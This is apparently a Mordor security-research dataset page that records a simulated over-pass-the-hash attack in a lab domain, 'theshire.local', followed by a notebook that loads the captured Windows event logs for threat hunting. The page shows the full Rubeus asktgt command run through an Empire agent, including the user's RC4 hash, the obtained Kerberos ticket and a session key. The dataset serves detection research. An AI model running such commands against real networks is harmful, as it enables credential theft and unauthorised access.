Rubeus Elevated ASKTGT CreateNetOnly

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/19

Modification Date

2020/09/21

Tactics

[‘TA0006’]

Techniques

[‘T1003.003’]

Tags

[‘Over-Pass-The-Hash’, ‘Not Touching LSASS’]

Dataset Description

This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

shell

Mordor shire

binary

asktgt

Adversary View

(Empire: G6BYHU4F) > shell C:\users\sbeavers\Desktop\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /createnetonly:C:\Windows\System32\cmd.exe
[*] Tasked 4EH9PC5S to run TASK_SHELL
[*] Agent 4EH9PC5S tasked with task ID 4
(Empire: 4EH9PC5S) > 
______        _                      
  (_____ \      | |                     
  _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0 

[*] Action: Ask TGT

[*] Showing process : False
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 10064
[+] LUID            : 0x42e7ba4

[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8
[*] Target LUID : 70155172
[*] Building AS-REQ (w/ preauth) for: 'theshire.local\pgustavo'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw
      IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr
      UHw92ESRb2uzf7C3GBZL2lN1UdDFIhvklZB/K21vINZO3G+ExWvoUxSVQQ+vYABaHcPGGeuYhXxRTwZB
      kPGYa0cFXtMSdSvXCGWVLz6LFPTco3puJNx4d0exgnjTBUp3MUQMw8x2CACCL9Cv0RYN+Wy4WLTzIF0t
      StYJk0I6g+vob7jOOAE6h8wp3XDfArkfcGndJmzBAgx5IeAL10yYArod69MykefCt3/uIbNJ9waMhov4
      cUInkStzt0QcFTZbvNgC30Dhew3jkzRBd5XxCHGMWkhY60ibhvfw5czUgAJ8VcsKfG+X1zkwIGRXxRhc
      c8COT4Z9614twkwjQ50FiRIxZBWHkxAKvzrwDtVE5v2alwfy827Sse85RoXPebKH11RMy8vFyPKsz4F8
      46Wv5F0wXPf1vEl5z99KatYf+DtBpYg+ZO7S6pT9Ov/dRkdKMBCNp/hCuiL4imjlpMaMoqiXaWSA0E61
      8ihQGj/qHXns2u4vujlrx/lvxgf/uCqanH5MYBviyFyvVDeuYw5yHQ0LXaf9aOcnOg3XnwJJfks/u+FZ
      FjDnfvubv1nNaPQ9QtzM2P5Y3U6/14a4Ks6XNocwWBbtAOXZ0ttzs+W1S7sXjSuPlZ3uye4yLMEV+u3h
      BwFoAQVl7usydsTx8Cur3FZQagYbdnJt6wOk5MtR7AlJvZ9WwJ6AOsaTFRyQ7rrHN6kFQklPELMCV7Dl
      5bR79T31hC7wEQ/eFWMuL9EeurCD20mhoDQCqLttEetwEi7R8LXE/shPKZNY/4cFhWtODbtUzMLzNo3W
      pvxOPNce0dB4lv8frBVFqumyMDKxcDkjEZv7uQaMH+ofWaAPARnRSzYSK+Bf8ECJTg4Cz5aHp4Mz6rJb
      1UcyQ1KyS150j0L/bIGfXr6u+CDKCvQ8w+h8p0gfqaqiNOyVfVdrHxxqcfnxrTOBoxNXwm02PomiGoH9
      T/uFchWCsM7OyCe1v05QT3jSi5Z2yHBmFWHLei96zm4Vu7JRkcQukE79q4Tb4OdiKuub0TByaDSAkC7a
      sd4QWyOew6gfbfJmAMkFAJnnAtIObcbeXBM/++sK1kpbs7fOVkCZP3w5arGsaY0zwwU9o/amWWalGrNd
      4jZq1xRJau7zwANNKTpEmXm10LGtdODlTpUfYSJTne97WzUBFLLMvUOMsVOeotm11qflE/BXU/MVmPJa
      7aaOEtApZHcHhQb+/u55SmrHXs1NQGtFsbBKotR7miHsOUqjhRBOmbjXEz8St4MoHqf7aJcIy20IoW8Q
      ASNHJSJHuDLJ5j+Wf+x0pV9dl03ocbaxWvtNzNw8drbo8bh2EWJmA9BdsKOB3DCB2aADAgEAooHRBIHO
      fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEE6gkql0M63etr3rDe/EiAyhEBsOVEhFU0hJUkUuTE9D
      QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAzMDMwN1qmERgPMjAy
      MDA5MjIxMzAzMDdapxEYDzIwMjAwOTI5MDMwMzA3WqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa
      MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=
[*] Target LUID: 0x42e7ba4
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  pgustavo
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  9/21/2020 11:03:07 PM
  EndTime               :  9/22/2020 9:03:07 AM
  RenewTill             :  9/28/2020 11:03:07 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  TqCSqXQzrd62vesN78SIDA==


..Command execution completed.

(Empire: 4EH9PC5S) > 

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_shell_rubeus_asktgt_createnetonly.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |526  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |394  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |353  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |284  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |226  |
|WORKSTATION6.theshire.local|security                                |4703   |214  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |175  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |169  |
|WORKSTATION6               |Windows PowerShell                      |800    |151  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |129  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |18     |103  |
|WORKSTATION5.theshire.local|security                                |4703   |87   |
|WORKSTATION6.theshire.local|security                                |4658   |64   |
|WORKSTATION5.theshire.local|security                                |4658   |62   |
|WORKSTATION5.theshire.local|security                                |4656   |52   |
|MORDORDC.theshire.local    |Security                                |5156   |44   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |43   |
|MORDORDC.theshire.local    |Security                                |5158   |34   |
|WORKSTATION6.theshire.local|security                                |4656   |32   |
|WORKSTATION6.theshire.local|security                                |4690   |32   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows